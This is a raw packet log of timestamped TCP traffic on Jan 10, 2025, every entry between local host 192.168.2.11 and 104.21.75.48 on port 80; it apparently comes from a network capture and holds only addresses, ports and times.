Jan 10, 2025 19:12:31.145908117 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.145920038 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.145931959 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.145963907 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.145963907 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.145987034 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.145997047 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146008968 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146028996 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146054983 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.146054983 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.146090031 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.146456957 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146509886 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.146568060 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146585941 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146598101 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146609068 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146642923 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.146642923 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146642923 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.146660089 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146666050 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.146682978 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146692038 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.146707058 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146709919 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.146719933 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146720886 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.146732092 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146744967 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146750927 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.146759033 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146770000 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146816969 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.146837950 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.146842957 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146857023 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146872044 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146900892 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146908998 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.146908998 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.146915913 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146931887 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146956921 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.146959066 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.146959066 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.147008896 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.147008896 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225431919 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225464106 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225477934 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225505114 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225523949 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225536108 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225537062 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225579977 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225589037 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225600958 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225613117 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225615978 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225624084 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225636959 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225651026 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225661993 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225680113 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225689888 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225703001 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225703001 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225703001 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225718021 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225728989 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225738049 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225768089 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225776911 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225776911 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225801945 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225814104 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225825071 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225836992 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225838900 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225838900 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225857973 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225876093 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225888968 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225893021 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225902081 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225913048 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225914955 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225930929 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225948095 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225949049 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225966930 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.225976944 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.225980043 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226000071 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226008892 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226012945 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226026058 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226030111 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226049900 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226049900 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226056099 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226069927 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226075888 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226090908 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226099968 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226114035 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226125002 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226136923 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226144075 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226144075 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226170063 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226185083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226197004 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226210117 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226226091 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226246119 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226258993 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226269960 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226280928 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226285934 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226285934 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226321936 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226336956 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226340055 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226350069 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226361036 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226377964 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226393938 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226393938 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226409912 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226440907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226453066 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226464987 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226476908 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226489067 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226492882 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226511955 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226536036 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226569891 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226587057 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226598978 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226609945 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226613045 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226627111 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226639032 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226644039 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226644039 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226650953 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226667881 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226701975 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226712942 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226718903 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226725101 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226749897 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226754904 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226767063 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226775885 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226788044 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.226805925 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226805925 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.226831913 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.233807087 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.233833075 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.233844995 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.233856916 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.233881950 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.233881950 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.233896017 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.233907938 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.233927011 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.233927011 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.233961105 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.233978987 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.233992100 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234003067 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234038115 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234040976 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.234040976 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.234054089 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234066010 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234078884 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234091997 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234103918 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.234117031 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234126091 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234138012 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234138012 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.234138012 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.234169960 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.234199047 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.234250069 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234261036 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234281063 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234292984 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234297991 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.234306097 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234316111 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234325886 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.234325886 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.234360933 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.234524965 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234544992 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234558105 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234572887 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.234586000 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234599113 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234601021 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.234611988 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234626055 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234632015 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.234638929 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.234659910 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.234695911 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235049963 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235075951 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235089064 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235099077 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235100031 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235114098 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235121965 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235141039 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235142946 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235152960 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235177040 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235183954 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235198975 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235210896 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235222101 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235222101 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235253096 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235275984 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235287905 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235321999 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235327005 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235346079 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235347033 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235363960 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235373974 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235373974 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235378027 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235392094 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235400915 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235410929 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235421896 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235429049 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235429049 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235450029 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235451937 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235466003 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235474110 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235479116 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235491991 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235496044 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235496044 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235503912 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.235521078 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235529900 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.235558987 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.313963890 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314016104 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314037085 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314055920 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314068079 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314075947 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314075947 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314100027 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314110041 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314121008 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314137936 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314137936 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314138889 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314189911 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314189911 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314203978 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314237118 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314249039 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314249992 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314259052 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314280987 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314287901 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314287901 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314299107 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314308882 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314318895 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314332962 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314344883 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314354897 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314379930 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314379930 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314393044 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314410925 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314423084 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314435005 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314445972 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314454079 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314456940 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314485073 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314487934 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314517021 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314524889 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314524889 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314529896 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314573050 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314573050 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314620972 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314637899 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314649105 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314661026 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314670086 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314686060 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314687014 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314692974 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314704895 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314711094 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314734936 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314738989 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314738989 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314745903 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314759016 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314763069 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314780951 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314780951 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314790964 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314801931 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314802885 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314811945 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314855099 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314855099 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314861059 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314873934 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.314913034 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314974070 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.314990997 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.315010071 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.315015078 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.315033913 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.315052032 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.315052986 CET	49726	80	192.168.2.11	104.21.75.48
